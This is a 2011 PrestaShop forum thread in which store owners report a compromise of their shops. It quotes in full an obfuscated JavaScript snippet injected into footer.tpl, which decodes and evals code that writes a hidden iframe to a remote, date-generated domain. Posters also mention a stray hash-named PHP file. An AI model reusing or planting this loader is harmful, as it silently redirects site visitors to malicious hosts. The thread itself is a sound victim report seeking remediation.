Slava Posted August 23, 2011 Share Posted August 23, 2011 Hi! I have got a question about some code lines which I found in my footer.tpl file. It's located just before </body> tag looks like below: {literal}<script>String.prototype.asd=function(){return String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v[i].length+1;o*=2;e=eval;m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>{/literal} I'm surprised because it's generating a small dot in next line under footer.(screen attached below) and red antivirus alert that it is Trojan.JS.Redirector.py Firebug inspection also attached in jpg. Looks very strange especially iframes with http addresses. The next thing or it may related to the previous is a strange PHP file found in /prestashop/download named something like: 67f4af42e1aec400c40b8ca1abfb259a.php and directory smarty_v2 in prestashop/tools magically disappeared. Where it came from on my website? It looks like code injection. Is this a flaw in the software store. I am very worried about the functioning of the store and customer data. Also, anti-virus warnings do not arouse confidence. For safety purposes, I removed this piece of code from footer.tpl and seems to be OK. But what if it happens again?! Thanks for suggestions. Regards. PrestaShop 1.4.3 standard modules Link to comment Share on other sites More sharing options...
geckoinfo Posted August 23, 2011 Share Posted August 23, 2011 Same thing for me..... Same code in footer.tpl, same strange php file found in /download......, smarty_v2 disappeared....... I removed this code from footer.tpl and I'm looking for solution. Prestashop 1.4.3 too Link to comment Share on other sites More sharing options...
Mike Kranzler Posted August 23, 2011 Share Posted August 23, 2011 Hi everybody, We're consolidating the discussion on this topic to one thread, which you can find here: http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/ I am going to close this thread to limit confusion, but we are working very hard to identify the source of this issue and close it off. I'm hoping to have news for all of you soon. -Mike Link to comment Share on other sites More sharing options...
.png.022b5452a8f28f552bc9430097a16da2.png)
Recommended Posts